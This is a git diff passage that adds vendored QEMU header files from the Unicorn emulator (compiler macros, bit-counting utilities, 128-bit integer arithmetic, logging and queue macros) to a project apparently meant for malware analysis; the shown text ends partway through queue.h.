diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/compiler.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/compiler.h new file mode 100644 index 0000000..d0e322f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/compiler.h @@ -0,0 +1,137 @@ +/* public domain */ + +#ifndef COMPILER_H +#define COMPILER_H + +#include "config-host.h" +#include "unicorn/platform.h" + +#ifdef _MSC_VER +// MSVC support + +#define inline __inline +#define __func__ __FUNCTION__ + +#include <math.h> +#include <float.h> + +#if _MSC_VER < MSC_VER_VS2013 +#define isinf(x) (!_finite(x)) +#if defined(_WIN64) +#define isnan _isnanf +#else +#define isnan _isnan +#endif +#endif + +/* gcc __builtin___clear_cache() */ +static inline void __builtin___clear_cache(void *beg, void *e) +{ + unsigned char *start = beg; + unsigned char *end = e; + FlushInstructionCache(GetCurrentProcess(), start, end - start); +} + +static inline double rint( double x ) +{ + return floor(x < 0 ? x - 0.5 : x + 0.5); +} + +union MSVC_FLOAT_HACK +{ + unsigned char Bytes[4]; + float Value; +}; + +#ifndef NAN +static union MSVC_FLOAT_HACK __NAN = {{0x00, 0x00, 0xC0, 0x7F}}; +#define NAN (__NAN.Value) +#endif + +#define QEMU_DIV0 __pragma(warning(suppress:2124)) // divide by zero error + +#define QEMU_GNUC_PREREQ(maj, min) 0 + +#define QEMU_NORETURN __declspec(noreturn) +#define QEMU_UNUSED_VAR __pragma(warning(suppress:4100)) // unused variables only +#define QEMU_UNUSED_FUNC +#define QEMU_WARN_UNUSED_RESULT +#define QEMU_ARTIFICIAL +#define QEMU_PACK( __Declaration__ ) __pragma( pack(push, 1) ) __Declaration__ __pragma( pack(pop) ) + +#define QEMU_ALIGN(A, B) __declspec(align(A)) B + +#define cat(x,y) x ## y +#define cat2(x,y) cat(x,y) +#define QEMU_BUILD_BUG_ON(x) \ + typedef char cat2(qemu_build_bug_on__,__LINE__)[(x)?-1:1] QEMU_UNUSED_VAR; + +#define GCC_FMT_ATTR(n, m) + +#else + +#ifndef NAN +#define NAN (0.0 / 0.0) +#endif + +/*---------------------------------------------------------------------------- +| The macro QEMU_GNUC_PREREQ tests for minimum version of the GNU C compiler. +| The code is a copy of SOFTFLOAT_GNUC_PREREQ, see softfloat-macros.h. +*----------------------------------------------------------------------------*/ +#if defined(__GNUC__) && defined(__GNUC_MINOR__) +# define QEMU_GNUC_PREREQ(maj, min) \ + ((__GNUC__ << 16) + __GNUC_MINOR__ >= ((maj) << 16) + (min)) +#else +# define QEMU_GNUC_PREREQ(maj, min) 0 +#endif + +#define QEMU_NORETURN __attribute__ ((__noreturn__)) + +#define QEMU_UNUSED_VAR __attribute__((unused)) +#define QEMU_UNUSED_FUNC __attribute__((unused)) + +#if QEMU_GNUC_PREREQ(3, 4) +#define QEMU_WARN_UNUSED_RESULT __attribute__((warn_unused_result)) +#else +#define QEMU_WARN_UNUSED_RESULT +#endif + +#if QEMU_GNUC_PREREQ(4, 3) +#define QEMU_ARTIFICIAL __attribute__((always_inline, artificial)) +#else +#define QEMU_ARTIFICIAL +#endif + +#if defined(_WIN32) +# define QEMU_PACK( __Declaration__ ) __Declaration__ __attribute__((gcc_struct, packed)) +#else +# define QEMU_PACK( __Declaration__ ) __Declaration__ __attribute__((packed)) +#endif + +#define QEMU_ALIGN(A, B) B __attribute__((aligned(A))) + +#define cat(x,y) x ## y +#define cat2(x,y) cat(x,y) +#define QEMU_BUILD_BUG_ON(x) \ + typedef char cat2(qemu_build_bug_on__,__LINE__)[(x)?-1:1] __attribute__((unused)); + +#if defined __GNUC__ +# if !QEMU_GNUC_PREREQ(4, 4) + /* gcc versions before 4.4.x don't support gnu_printf, so use printf. */ +# define GCC_FMT_ATTR(n, m) __attribute__((format(printf, n, m))) +# else + /* Use gnu_printf when supported (qemu uses standard format strings). */ +# define GCC_FMT_ATTR(n, m) __attribute__((format(gnu_printf, n, m))) +# if defined(_WIN32) + /* Map __printf__ to __gnu_printf__ because we want standard format strings + * even when MinGW or GLib include files use __printf__. */ +# define __printf__ __gnu_printf__ +# endif +# endif +#else +#define GCC_FMT_ATTR(n, m) +#endif + +#endif // _MSC_VER + +#endif /* COMPILER_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/crc32c.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/crc32c.h new file mode 100644 index 0000000..dafb6a1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/crc32c.h @@ -0,0 +1,35 @@ +/* + * Castagnoli CRC32C Checksum Algorithm + * + * Polynomial: 0x11EDC6F41 + * + * Castagnoli93: Guy Castagnoli and Stefan Braeuer and Martin Herrman + * "Optimization of Cyclic Redundancy-Check Codes with 24 + * and 32 Parity Bits",IEEE Transactions on Communication, + * Volume 41, Number 6, June 1993 + * + * Copyright (c) 2013 Red Hat, Inc., + * + * Authors: + * Jeff Cody <jcody@redhat.com> + * + * Based on the Linux kernel cryptographic crc32c module, + * + * Copyright (c) 2004 Cisco Systems, Inc. + * Copyright (c) 2008 Herbert Xu <herbert@gondor.apana.org.au> + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of the GNU General Public License as published by the Free + * Software Foundation; either version 2 of the License, or (at your option) + * any later version. + * + */ + +#ifndef QEMU_CRC32C_H +#define QEMU_CRC32C_H + +#include "qemu-common.h" + +uint32_t crc32c(uint32_t crc, const uint8_t *data, unsigned int length); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/host-utils.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/host-utils.h new file mode 100644 index 0000000..f6157cf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/host-utils.h @@ -0,0 +1,382 @@ +/* + * Utility compute operations used by translated code. + * + * Copyright (c) 2007 Thiemo Seufer + * Copyright (c) 2007 Jocelyn Mayer + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#ifndef HOST_UTILS_H +#define HOST_UTILS_H 1 + +#include "qemu/compiler.h" /* QEMU_GNUC_PREREQ */ +#include <limits.h> + +#ifdef CONFIG_INT128 +static inline void mulu64(uint64_t *plow, uint64_t *phigh, + uint64_t a, uint64_t b) +{ + __uint128_t r = (__uint128_t)a * b; + *plow = r; + *phigh = r >> 64; +} + +static inline void muls64(uint64_t *plow, uint64_t *phigh, + int64_t a, int64_t b) +{ + __int128_t r = (__int128_t)a * b; + *plow = r; + *phigh = r >> 64; +} + +static inline int divu128(uint64_t *plow, uint64_t *phigh, uint64_t divisor) +{ + if (divisor == 0) { + return 1; + } else { + __uint128_t dividend = ((__uint128_t)*phigh << 64) | *plow; + __uint128_t result = dividend / divisor; + *plow = result; + *phigh = dividend % divisor; + return result > UINT64_MAX; + } +} + +static inline int divs128(int64_t *plow, int64_t *phigh, int64_t divisor) +{ + if (divisor == 0) { + return 1; + } else { + __int128_t dividend = ((__int128_t)*phigh << 64) | *plow; + __int128_t result = dividend / divisor; + *plow = result; + *phigh = dividend % divisor; + return result != *plow; + } +} +#else +void muls64(uint64_t *phigh, uint64_t *plow, int64_t a, int64_t b); +void mulu64(uint64_t *phigh, uint64_t *plow, uint64_t a, uint64_t b); +int divu128(uint64_t *plow, uint64_t *phigh, uint64_t divisor); +int divs128(int64_t *plow, int64_t *phigh, int64_t divisor); +#endif + +/** + * clz32 - count leading zeros in a 32-bit value. + * @val: The value to search + * + * Returns 32 if the value is zero. Note that the GCC builtin is + * undefined if the value is zero. + */ +static inline int clz32(uint32_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return val ? __builtin_clz(val) : 32; +#else + /* Binary search for the leading one bit. */ + int cnt = 0; + + if (!(val & 0xFFFF0000U)) { + cnt += 16; + val <<= 16; + } + if (!(val & 0xFF000000U)) { + cnt += 8; + val <<= 8; + } + if (!(val & 0xF0000000U)) { + cnt += 4; + val <<= 4; + } + if (!(val & 0xC0000000U)) { + cnt += 2; + val <<= 2; + } + if (!(val & 0x80000000U)) { + cnt++; + val <<= 1; + } + if (!(val & 0x80000000U)) { + cnt++; + } + return cnt; +#endif +} + +/** + * clo32 - count leading ones in a 32-bit value. + * @val: The value to search + * + * Returns 32 if the value is -1. + */ +static inline int clo32(uint32_t val) +{ + return clz32(~val); +} + +/** + * clz64 - count leading zeros in a 64-bit value. + * @val: The value to search + * + * Returns 64 if the value is zero. Note that the GCC builtin is + * undefined if the value is zero. + */ +static inline int clz64(uint64_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return val ? __builtin_clzll(val) : 64; +#else + int cnt = 0; + + if (!(val >> 32)) { + cnt += 32; + } else { + val >>= 32; + } + + return cnt + clz32((uint32_t)val); +#endif +} + +/** + * clo64 - count leading ones in a 64-bit value. + * @val: The value to search + * + * Returns 64 if the value is -1. + */ +static inline int clo64(uint64_t val) +{ + return clz64(~val); +} + +/** + * ctz32 - count trailing zeros in a 32-bit value. + * @val: The value to search + * + * Returns 32 if the value is zero. Note that the GCC builtin is + * undefined if the value is zero. + */ +static inline int ctz32(uint32_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return val ? __builtin_ctz(val) : 32; +#else + /* Binary search for the trailing one bit. */ + int cnt; + + cnt = 0; + if (!(val & 0x0000FFFFUL)) { + cnt += 16; + val >>= 16; + } + if (!(val & 0x000000FFUL)) { + cnt += 8; + val >>= 8; + } + if (!(val & 0x0000000FUL)) { + cnt += 4; + val >>= 4; + } + if (!(val & 0x00000003UL)) { + cnt += 2; + val >>= 2; + } + if (!(val & 0x00000001UL)) { + cnt++; + val >>= 1; + } + if (!(val & 0x00000001UL)) { + cnt++; + } + + return cnt; +#endif +} + +/** + * cto32 - count trailing ones in a 32-bit value. + * @val: The value to search + * + * Returns 32 if the value is -1. + */ +static inline int cto32(uint32_t val) +{ + return ctz32(~val); +} + +/** + * ctz64 - count trailing zeros in a 64-bit value. + * @val: The value to search + * + * Returns 64 if the value is zero. Note that the GCC builtin is + * undefined if the value is zero. + */ +static inline int ctz64(uint64_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return val ? __builtin_ctzll(val) : 64; +#else + int cnt; + + cnt = 0; + if (!((uint32_t)val)) { + cnt += 32; + val >>= 32; + } + + return cnt + ctz32((uint32_t)val); +#endif +} + +/** + * cto64 - count trailing ones in a 64-bit value. + * @val: The value to search + * + * Returns 64 if the value is -1. + */ +static inline int cto64(uint64_t val) +{ + return ctz64(~val); +} + +/** + * clrsb32 - count leading redundant sign bits in a 32-bit value. + * @val: The value to search + * + * Returns the number of bits following the sign bit that are equal to it. + * No special cases; output range is [0-31]. + */ +static inline int clrsb32(uint32_t val) +{ +#if QEMU_GNUC_PREREQ(4, 7) + return __builtin_clrsb(val); +#else + return clz32(val ^ ((int32_t)val >> 1)) - 1; +#endif +} + +/** + * clrsb64 - count leading redundant sign bits in a 64-bit value. + * @val: The value to search + * + * Returns the number of bits following the sign bit that are equal to it. + * No special cases; output range is [0-63]. + */ +static inline int clrsb64(uint64_t val) +{ +#if QEMU_GNUC_PREREQ(4, 7) + return __builtin_clrsbll(val); +#else + return clz64(val ^ ((int64_t)val >> 1)) - 1; +#endif +} + +/** + * ctpop8 - count the population of one bits in an 8-bit value. + * @val: The value to search + */ +static inline int ctpop8(uint8_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return __builtin_popcount(val); +#else + val = (val & 0x55) + ((val >> 1) & 0x55); + val = (val & 0x33) + ((val >> 2) & 0x33); + val = (val & 0x0f) + ((val >> 4) & 0x0f); + + return val; +#endif +} + +/** + * ctpop16 - count the population of one bits in a 16-bit value. + * @val: The value to search + */ +static inline int ctpop16(uint16_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return __builtin_popcount(val); +#else + val = (val & 0x5555) + ((val >> 1) & 0x5555); + val = (val & 0x3333) + ((val >> 2) & 0x3333); + val = (val & 0x0f0f) + ((val >> 4) & 0x0f0f); + val = (val & 0x00ff) + ((val >> 8) & 0x00ff); + + return val; +#endif +} + +/** + * ctpop32 - count the population of one bits in a 32-bit value. + * @val: The value to search + */ +static inline int ctpop32(uint32_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return __builtin_popcount(val); +#else + val = (val & 0x55555555) + ((val >> 1) & 0x55555555); + val = (val & 0x33333333) + ((val >> 2) & 0x33333333); + val = (val & 0x0f0f0f0f) + ((val >> 4) & 0x0f0f0f0f); + val = (val & 0x00ff00ff) + ((val >> 8) & 0x00ff00ff); + val = (val & 0x0000ffff) + ((val >> 16) & 0x0000ffff); + + return val; +#endif +} + +/** + * ctpop64 - count the population of one bits in a 64-bit value. + * @val: The value to search + */ +static inline int ctpop64(uint64_t val) +{ +#if QEMU_GNUC_PREREQ(3, 4) + return __builtin_popcountll(val); +#else + val = (val & 0x5555555555555555ULL) + ((val >> 1) & 0x5555555555555555ULL); + val = (val & 0x3333333333333333ULL) + ((val >> 2) & 0x3333333333333333ULL); + val = (val & 0x0f0f0f0f0f0f0f0fULL) + ((val >> 4) & 0x0f0f0f0f0f0f0f0fULL); + val = (val & 0x00ff00ff00ff00ffULL) + ((val >> 8) & 0x00ff00ff00ff00ffULL); + val = (val & 0x0000ffff0000ffffULL) + ((val >> 16) & 0x0000ffff0000ffffULL); + val = (val & 0x00000000ffffffffULL) + ((val >> 32) & 0x00000000ffffffffULL); + + return (int)val; +#endif +} + +/* Host type specific sizes of these routines. */ + +#if ULONG_MAX == UINT32_MAX +# define clzl clz32 +# define ctzl ctz32 +# define clol clo32 +# define ctol cto32 +# define ctpopl ctpop32 +#elif ULONG_MAX == UINT64_MAX +# define clzl clz64 +# define ctzl ctz64 +# define clol clo64 +# define ctol cto64 +# define ctpopl ctpop64 +#else +# error Unknown sizeof long +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/int128.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/int128.h new file mode 100644 index 0000000..f435210 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/int128.h @@ -0,0 +1,157 @@ +#ifndef INT128_H +#define INT128_H + +//#include <assert.h> +#include "unicorn/platform.h" + +typedef struct Int128 Int128; + +struct Int128 { + uint64_t lo; + int64_t hi; +}; + +static inline Int128 int128_make64(uint64_t a) +{ + Int128 i128 = { a, 0 }; + return i128; +} + +static inline uint64_t int128_get64(Int128 a) +{ + //assert(!a.hi); + return a.lo; +} + +static inline Int128 int128_zero(void) +{ + return int128_make64(0); +} + +static inline Int128 int128_one(void) +{ + return int128_make64(1); +} + +static inline Int128 int128_2_64(void) +{ + Int128 i128 = { 0, 1 }; + return i128; +} + +static inline Int128 int128_exts64(int64_t a) +{ + Int128 i128 = { a, (a < 0) ? -1 : 0 }; + return i128; +} + +static inline Int128 int128_and(Int128 a, Int128 b) +{ + Int128 i128 = { a.lo & b.lo, a.hi & b.hi }; + return i128; +} + +static inline Int128 int128_rshift(Int128 a, int n) +{ + int64_t h; + if (!n) { + return a; + } + h = a.hi >> (n & 63); + if (n >= 64) { + Int128 i128 = { h, h >> 63 }; + return i128; + } else { + Int128 i128 = { (a.lo >> n) | ((uint64_t)a.hi << (64 - n)), h }; + return i128; + } +} + +static inline Int128 int128_add(Int128 a, Int128 b) +{ + uint64_t lo = a.lo + b.lo; + + /* a.lo <= a.lo + b.lo < a.lo + k (k is the base, 2^64). Hence, + * a.lo + b.lo >= k implies 0 <= lo = a.lo + b.lo - k < a.lo. + * Similarly, a.lo + b.lo < k implies a.lo <= lo = a.lo + b.lo < k. + * + * So the carry is lo < a.lo. + */ + Int128 i128 = { lo, (uint64_t)a.hi + b.hi + (lo < a.lo) }; + return i128; +} + +static inline Int128 int128_neg(Int128 a) +{ + uint64_t lo = 0-a.lo; + Int128 i128 = { lo, ~(uint64_t)a.hi + !lo }; + return i128; +} + +static inline Int128 int128_sub(Int128 a, Int128 b) +{ + Int128 i128 = { a.lo - b.lo, (uint64_t)a.hi - b.hi - (a.lo < b.lo) }; + return i128; +} + +static inline bool int128_nonneg(Int128 a) +{ + return a.hi >= 0; +} + +static inline bool int128_eq(Int128 a, Int128 b) +{ + return a.lo == b.lo && a.hi == b.hi; +} + +static inline bool int128_ne(Int128 a, Int128 b) +{ + return !int128_eq(a, b); +} + +static inline bool int128_ge(Int128 a, Int128 b) +{ + return a.hi > b.hi || (a.hi == b.hi && a.lo >= b.lo); +} + +static inline bool int128_lt(Int128 a, Int128 b) +{ + return !int128_ge(a, b); +} + +static inline bool int128_le(Int128 a, Int128 b) +{ + return int128_ge(b, a); +} + +static inline bool int128_gt(Int128 a, Int128 b) +{ + return !int128_le(a, b); +} + +static inline bool int128_nz(Int128 a) +{ + return a.lo || a.hi; +} + +static inline Int128 int128_min(Int128 a, Int128 b) +{ + return int128_le(a, b) ? a : b; +} + +static inline Int128 int128_max(Int128 a, Int128 b) +{ + return int128_ge(a, b) ? a : b; +} + +static inline void int128_addto(Int128 *a, Int128 b) +{ + *a = int128_add(*a, b); +} + +static inline void int128_subfrom(Int128 *a, Int128 b) +{ + *a = int128_sub(*a, b); +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/log.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/log.h new file mode 100644 index 0000000..6f9ccdf --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/log.h @@ -0,0 +1,117 @@ +#ifndef QEMU_LOG_H +#define QEMU_LOG_H + +#include <stdarg.h> +#include "unicorn/platform.h" +#include "qemu/compiler.h" +#include "qom/cpu.h" + +/* Private global variables, don't use */ +extern FILE *qemu_logfile; +extern int qemu_loglevel; + +/* + * The new API: + * + */ + +/* Log settings checking macros: */ + +/* Returns true if qemu_log() will really write somewhere + */ +static inline bool qemu_log_enabled(void) +{ + return qemu_logfile != NULL; +} + +#define CPU_LOG_TB_OUT_ASM (1 << 0) +#define CPU_LOG_TB_IN_ASM (1 << 1) +#define CPU_LOG_TB_OP (1 << 2) +#define CPU_LOG_TB_OP_OPT (1 << 3) +#define CPU_LOG_INT (1 << 4) +#define CPU_LOG_EXEC (1 << 5) +#define CPU_LOG_PCALL (1 << 6) +#define CPU_LOG_IOPORT (1 << 7) +#define CPU_LOG_TB_CPU (1 << 8) +#define CPU_LOG_RESET (1 << 9) +#define LOG_UNIMP (1 << 10) +#define LOG_GUEST_ERROR (1 << 11) + +/* Returns true if a bit is set in the current loglevel mask + */ +static inline bool qemu_loglevel_mask(int mask) +{ + return (qemu_loglevel & mask) != 0; +} + +/* Logging functions: */ + +/* main logging function + */ +void GCC_FMT_ATTR(1, 2) qemu_log(const char *fmt, ...); + +/* vfprintf-like logging function + */ +static inline void GCC_FMT_ATTR(1, 0) +qemu_log_vprintf(const char *fmt, va_list va) +{ + if (qemu_logfile) { + vfprintf(qemu_logfile, fmt, va); + } +} + +/* log only if a bit is set on the current loglevel mask + */ +void GCC_FMT_ATTR(2, 3) qemu_log_mask(int mask, const char *fmt, ...); + + +/* Special cases: */ + +/* cpu_dump_state() logging functions: */ +/** + * log_cpu_state: + * @cpu: The CPU whose state is to be logged. + * @flags: Flags what to log. + * + * Logs the output of cpu_dump_state(). + */ +static inline void log_cpu_state(CPUState *cpu, int flags) +{ + if (qemu_log_enabled()) { + cpu_dump_state(cpu, qemu_logfile, fprintf, flags); + } +} + +/** + * log_cpu_state_mask: + * @mask: Mask when to log. + * @cpu: The CPU whose state is to be logged. + * @flags: Flags what to log. + * + * Logs the output of cpu_dump_state() if loglevel includes @mask. + */ +static inline void log_cpu_state_mask(int mask, CPUState *cpu, int flags) +{ + if (qemu_loglevel & mask) { + log_cpu_state(cpu, flags); + } +} + +/* fflush() the log file */ +static inline void qemu_log_flush(void) +{ + fflush(qemu_logfile); +} + +/* Close the log file */ +static inline void qemu_log_close(void) +{ + if (qemu_logfile) { + if (qemu_logfile != stderr) { + fclose(qemu_logfile); + } + qemu_logfile = NULL; + } +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/module.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/module.h new file mode 100644 index 0000000..01b9fe5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/module.h @@ -0,0 +1,30 @@ +/* + * QEMU Module Infrastructure + * + * Copyright IBM, Corp. 2009 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU GPL, version 2. See + * the COPYING file in the top-level directory. + * + */ + +#ifndef QEMU_MODULE_H +#define QEMU_MODULE_H + +#include "qemu/osdep.h" + +typedef enum { + MODULE_INIT_MACHINE, + MODULE_INIT_QOM, + MODULE_INIT_MAX +} module_init_type; + +#define machine_init(function) module_init(function, MODULE_INIT_MACHINE) +#define type_init(function) module_init(function, MODULE_INIT_QOM) + +void module_call_init(struct uc_struct *uc, module_init_type type); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/osdep.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/osdep.h new file mode 100644 index 0000000..5387816 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/osdep.h @@ -0,0 +1,128 @@ +#ifndef QEMU_OSDEP_H +#define QEMU_OSDEP_H + +#include "config-host.h" +#include <stdarg.h> +#include <stddef.h> +#include "unicorn/platform.h" +#include <sys/types.h> +#ifdef __OpenBSD__ +#include <sys/signal.h> +#endif + +#ifndef _WIN32 +#include <sys/wait.h> +#else +#define WIFEXITED(x) 1 +#define WEXITSTATUS(x) (x) +#endif + +#if defined(CONFIG_SOLARIS) && CONFIG_SOLARIS_VERSION < 10 +/* [u]int_fast*_t not in <sys/int_types.h> */ +typedef unsigned char uint_fast8_t; +typedef unsigned int uint_fast16_t; +typedef signed int int_fast16_t; +#endif + +#ifndef glue +#define xglue(x, y) x ## y +#define glue(x, y) xglue(x, y) +#define stringify(s) tostring(s) +#define tostring(s) #s +#endif + +#ifndef likely +#if __GNUC__ < 3 +#define __builtin_expect(x, n) (x) +#endif + +#define likely(x) __builtin_expect(!!(x), 1) +#define unlikely(x) __builtin_expect(!!(x), 0) +#endif + +#ifndef container_of +#ifndef _MSC_VER +#define container_of(ptr, type, member) ({ \ + const typeof(((type *) 0)->member) *__mptr = (ptr); \ + (type *) ((char *) __mptr - offsetof(type, member));}) +#else +#define container_of(ptr, type, member) ((type *)((char *)(ptr) -offsetof(type,member))) +#endif +#endif + +/* Convert from a base type to a parent type, with compile time checking. */ +#ifdef __GNUC__ +#define DO_UPCAST(type, field, dev) ( __extension__ ( { \ + char QEMU_UNUSED_VAR offset_must_be_zero[ \ + -offsetof(type, field)]; \ + container_of(dev, type, field);})) +#else +#define DO_UPCAST(type, field, dev) container_of(dev, type, field) +#endif + +#define typeof_field(type, field) typeof(((type *)0)->field) +#define type_check(t1,t2) ((t1*)0 - (t2*)0) + +#ifndef MIN +#define MIN(a, b) (((a) < (b)) ? (a) : (b)) +#endif +#ifndef MAX +#define MAX(a, b) (((a) > (b)) ? (a) : (b)) +#endif + +/* Minimum function that returns zero only iff both values are zero. + * Intended for use with unsigned values only. */ +#ifndef MIN_NON_ZERO +#define MIN_NON_ZERO(a, b) (((a) != 0 && (a) < (b)) ? (a) : (b)) +#endif + +#ifndef ROUND_UP +#define ROUND_UP(n,d) (((n) + (d) - 1) & -(d)) +#endif + +#ifndef DIV_ROUND_UP +#define DIV_ROUND_UP(n,d) (((n) + (d) - 1) / (d)) +#endif + +#ifndef ARRAY_SIZE +#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0])) +#endif + +#ifndef always_inline +#if !((__GNUC__ < 3) || defined(__APPLE__)) +#ifdef __OPTIMIZE__ +#undef inline +#define inline __attribute__ (( always_inline )) __inline__ +#endif +#endif +#else +#undef inline +#define inline always_inline +#endif + +#define qemu_printf printf + +void *qemu_try_memalign(size_t alignment, size_t size); +void *qemu_memalign(size_t alignment, size_t size); +void *qemu_anon_ram_alloc(size_t size, uint64_t *align); +void qemu_vfree(void *ptr); +void qemu_anon_ram_free(void *ptr, size_t size); + +#if defined(__HAIKU__) && defined(__i386__) +#define FMT_pid "%ld" +#elif defined(WIN64) +#define FMT_pid "%" PRId64 +#else +#define FMT_pid "%d" +#endif + +/** + * qemu_getauxval: + * @type: the auxiliary vector key to lookup + * + * Search the auxiliary vector for @type, returning the value + * or 0 if @type is not present. + */ +unsigned long qemu_getauxval(unsigned long type); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/queue.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/queue.h new file mode 100644 index 0000000..d433b90 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/queue.h @@ -0,0 +1,414 @@ +/* $NetBSD: queue.h,v 1.52 2009/04/20 09:56:08 mschuett Exp $ */ + +/* + * QEMU version: Copy from netbsd, removed debug code, removed some of + * the implementations. Left in singly-linked lists, lists, simple + * queues, and tail queues. + */ + +/* + * Copyright (c) 1991, 1993 + * The Regents of the University of California. All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions + * are met: + * 1. Redistributions of source code must retain the above copyright + * notice, this list of conditions and the following disclaimer. + * 2. Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in the + * documentation and/or other materials provided with the distribution. + * 3. Neither the name of the University nor the names of its contributors + * may be used to endorse or promote products derived from this software + * without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND + * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS + * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + * SUCH DAMAGE. + * + * @(#)queue.h 8.5 (Berkeley) 8/20/94 + */ + +#ifndef QEMU_SYS_QUEUE_H_ +#define QEMU_SYS_QUEUE_H_ + +/* + * This file defines four types of data structures: singly-linked lists, + * lists, simple queues, and tail queues. + * + * A singly-linked list is headed by a single forward pointer. The + * elements are singly linked for minimum space and pointer manipulation + * overhead at the expense of O(n) removal for arbitrary elements. New + * elements can be added to the list after an existing element or at the + * head of the list. Elements being removed from the head of the list + * should use the explicit macro for this purpose for optimum + * efficiency. A singly-linked list may only be traversed in the forward + * direction. Singly-linked lists are ideal for applications with large + * datasets and few or no removals or for implementing a LIFO queue. + * + * A list is headed by a single forward pointer (or an array of forward + * pointers for a hash table header). The elements are doubly linked + * so that an arbitrary element can be removed without a need to + * traverse the list. New elements can be added to the list before + * or after an existing element or at the head of the list. A list + * may only be traversed in the forward direction. + * + * A simple queue is headed by a pair of pointers, one the head of the + * list and the other to the tail of the list. The elements are singly + * linked to save space, so elements can only be removed from the + * head of the list. New elements can be added to the list after + * an existing element, at the head of the list, or at the end of the + * list. A simple queue may only be traversed in the forward direction. + * + * A tail queue is headed by a pair of pointers, one to the head of the + * list and the other to the tail of the list. The elements are doubly + * linked so that an arbitrary element can be removed without a need to + * traverse the list. New elements can be added to the list before or + * after an existing element, at the head of the list, or at the end of + * the list. A tail queue may be traversed in either direction. + * + * For details on the use of these macros, see the queue(3) manual page. + */ + +#include "qemu/atomic.h" /* for smp_wmb() */ + +/* + * List definitions. + */ +#define QLIST_HEAD(name, type) \ +struct name { \ + struct type *lh_first; /* first element */ \ +} + +#define QLIST_HEAD_INITIALIZER(head) \ + { NULL } + +#define QLIST_ENTRY(type) \ +struct { \ + struct type *le_next; /* next element */ \ + struct type **le_prev; /* address of previous next element */ \ +} + +/* + * List functions. + */ +#define QLIST_INIT(head) do { \ + (head)->lh_first = NULL; \ +} while (/*CONSTCOND*/0) + +#define QLIST_INSERT_AFTER(listelm, elm, field) do { \ + if (((elm)->field.le_next = (listelm)->field.le_next) != NULL) \ + (listelm)->field.le_next->field.le_prev = \ + &(elm)->field.le_next; \ + (listelm)->field.le_next = (elm); \ + (elm)->field.le_prev 